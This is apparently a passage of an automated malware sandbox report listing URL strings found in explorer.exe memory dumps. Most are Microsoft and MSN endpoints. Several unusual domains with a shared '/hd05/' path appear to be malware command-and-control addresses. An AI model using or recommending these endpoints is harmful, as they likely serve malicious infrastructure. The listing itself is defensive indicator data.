Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.thierrydoublein.com/hd05/www.dropshunter.net
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.thierrydoublein.comReferer:
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.thingsidonaked.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.thingsidonaked.com/hd05/
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.thingsidonaked.com/hd05/www.lezxop.xyz
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thingsidonaked.com/hd05/www.lorenzodavissr.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.thingsidonaked.comReferer:
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trexendofparadise.club
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trexendofparadise.club/hd05/
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trexendofparadise.club/hd05/www.system.ngo
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.trexendofparadise.club/hd05/www.thingsidonaked.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trexendofparadise.clubReferer:
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.vagabondtracks.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.vagabondtracks.com/hd05/
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vagabondtracks.com/hd05/www.9orwr6.vip
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.vagabondtracks.com/hd05/www.damtherncooling.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.vagabondtracks.comReferer:
Source: explorer.exe, 0000000A.00000000.1451364940.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1486110658.000000000BCAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2430854965.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000000A.00000000.1451364940.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1486110658.000000000BCAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2430854965.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000A.00000000.1451364940.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1486110658.000000000BCAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2430854965.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSA4
Source: explorer.exe, 0000000A.00000000.1451364940.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1486110658.000000000BCAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2430854965.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSd
Source: explorer.exe, 0000000A.00000003.1482870190.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3693340134.0000000008E16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2482136380.0000000008E16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3877919375.0000000008E16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008E16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008E16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000001C.00000003.2482136380.0000000008E87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3703611921.00000000049F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2535542701.00000000049F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3702322334.00000000049F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2581754198.00000000049F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000003.1480835602.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1445045558.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2426276889.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000001C.00000003.2565249669.0000000008DBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3693340134.0000000008D90000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2482136380.0000000008DD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3877919375.0000000008D90000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008DAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?S)
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1445045558.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1480835602.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2426276889.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000001C.00000002.3866982528.0000000003294000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3700126244.0000000003294000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3702761587.0000000003294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?FP
Source: explorer.exe, 0000000A.00000000.1445045558.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1480835602.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2426276889.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000001C.00000003.3691932048.0000000008CA5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3877694186.0000000008CA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comh
Source: explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000001C.00000003.2431529850.0000000004857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/crypto/icons/Cryptoc2112Image.png
Source: explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
Source: explorer.exe, 0000001C.00000003.2506605753.0000000004971000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: explorer.exe, 0000000A.00000002.2430854965.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1451364940.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
